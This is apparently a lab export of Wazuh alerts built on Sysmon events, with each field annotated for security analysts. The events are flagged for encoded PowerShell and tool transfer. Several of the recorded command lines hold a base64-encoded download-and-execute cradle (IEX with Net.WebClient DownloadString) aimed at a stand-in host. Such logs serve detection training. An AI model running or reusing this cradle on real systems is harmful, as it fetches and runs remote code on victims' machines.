ParentProcessGuid: {94294ddc-bdd0-680a-cb0b-000000000e00}
ParentProcessId: 17072
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:19.211 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdd3-680a-cd0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 17212 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdd0-680a-cb0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 17072 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 110 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534423.2046378 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:20.6436679Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285885 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:20.629
ProcessGuid: {94294ddc-bdd3-680a-cd0b-000000000e00}
ProcessId: 17212
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ng0zpqlc.nyj.ps1
CreationUtcTime: 2025-04-24 22:40:20.629
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:20.629 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdd3-680a-cd0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 17212 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ng0zpqlc.nyj.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:20.629 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 107 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534425.2049147 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:23.0952982Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285927 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:21.885
ProcessGuid: {94294ddc-bdd5-680a-cf0b-000000000e00}
ProcessId: 17332
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdd3-680a-cd0b-000000000e00}
ParentProcessId: 17212
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:21.885 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdd5-680a-cf0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 17332 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdd3-680a-cd0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 17212 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 111 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534425.2057218 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:23.2871264Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285928 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:23.247
ProcessGuid: {94294ddc-bdd5-680a-cf0b-000000000e00}
ProcessId: 17332
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_cyvz0ll2.4w1.ps1
CreationUtcTime: 2025-04-24 22:40:23.247
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:23.247 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdd5-680a-cf0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 17332 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_cyvz0ll2.4w1.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:23.247 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 108 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534428.2059987 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:25.5105277Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285959 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:24.293
ProcessGuid: {94294ddc-bdd8-680a-d10b-000000000e00}
ProcessId: 4932
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdd5-680a-cf0b-000000000e00}
ParentProcessId: 17332
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:24.293 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdd8-680a-d10b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 4932 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdd5-680a-cf0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 17332 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
